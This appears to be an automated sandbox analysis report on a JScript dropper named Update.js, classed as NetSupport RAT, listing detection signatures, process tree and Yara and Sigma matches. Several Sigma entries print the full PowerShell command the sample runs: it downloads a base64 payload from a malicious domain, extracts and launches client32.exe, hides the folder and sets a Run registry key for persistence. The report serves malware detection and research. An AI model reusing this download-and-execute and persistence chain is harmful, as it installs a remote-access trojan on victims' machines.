Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Update.js

Overview

General Information

Sample name:Update.js
Analysis ID:1508730
MD5:44b73d7c14986000a0865aefb01bf02b
SHA1:0f41ec94c405aa3e46b090a3ecda574cb01f17b3
SHA256:82a6ea1721bb31929e77725f9bb6e4dc38719ce8d61a5633285aed7cd5260b40
Tags:5-181-159-137jsnetsupport
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 2324 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • client32.exe (PID: 2760 cmdline: "C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 2872 cmdline: "C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • svchost.exe (PID: 4196 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • client32.exe (PID: 1096 cmdline: "C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x34769a:$b1: ::WriteAllBytes(
  • 0x34751e:$b2: ::FromBase64String(
  • 0x63eec:$s3: Reverse
  • 0x63fba:$s3: Reverse
  • 0x64244:$s3: reverse
  • 0x6429a:$s3: Reverse
  • 0x642ed:$s3: Reverse
  • 0x645c2:$s3: reverse
  • 0x64618:$s3: Reverse
  • 0x64634:$s3: reverse
  • 0x64a8e:$s3: Reverse
  • 0x64af7:$s3: Reverse
  • 0x64dbb:$s3: Reverse
  • 0x64e27:$s3: Reverse
  • 0x64ea7:$s3: Reverse
  • 0x64f20:$s3: Reverse
  • 0x64f80:$s3: Reverse
  • 0x64fc4:$s3: reverse
  • 0x6511c:$s3: Reverse
  • 0x651cb:$s3: Reverse
  • 0x65241:$s3: Reverse

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000000B.00000002.3445824799.00000000003A2000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              0000000D.00000002.2436230246.00000000003A2000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                0000000D.00000002.2437544828.0000000011194000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  0000000D.00000002.2437544828.0000000011194000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000012.00000002.2518264391.00000000111E2000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 17 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      18.2.client32.exe.6fb60000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        13.2.client32.exe.73f40000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          13.2.client32.exe.6fb60000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            11.2.client32.exe.6fb60000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              18.2.client32.exe.73f40000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 23 entries

                                Other

                                SourceRuleDescriptionAuthorStrings
                                amsi64_2324.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                                • 0x31bef3:$b1: ::WriteAllBytes(
                                • 0x31bdbd:$b2: ::FromBase64String(
                                • 0x612bf:$s3: Reverse
                                • 0x6134a:$s3: Reverse
                                • 0x615dc:$s3: reverse
                                • 0x61632:$s3: Reverse
                                • 0x61685:$s3: Reverse
                                • 0x6191e:$s3: reverse
                                • 0x61974:$s3: Reverse
                                • 0x61990:$s3: reverse
                                • 0x61e02:$s3: Reverse
                                • 0x61e6c:$s3: Reverse
                                • 0x620f9:$s3: Reverse
                                • 0x62166:$s3: Reverse
                                • 0x621e8:$s3: Reverse
                                • 0x62262:$s3: Reverse
                                • 0x622c3:$s3: Reverse
                                • 0x62309:$s3: reverse
                                • 0x62468:$s3: Reverse
                                • 0x624d1:$s3: Reverse
                                • 0x62548:$s3: Reverse

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Base64 Encoded PowerShell Command Detected
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2324, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minim
                                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2324, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minim
                                Sigma detected: Script Initiated Connection to Non-Local Network
                                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 8.39.147.104, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 2324, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49718
                                Sigma detected: Suspicious PowerShell Parameter Substring
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2324, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minim
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ProcessId: 2324, ProcessName: wscript.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5880, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CJYJHX
                                Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5880, TargetFilename: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                Sigma detected: PowerShell Download Pattern
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2324, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minim
                                Sigma detected: PowerShell Web Download
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: 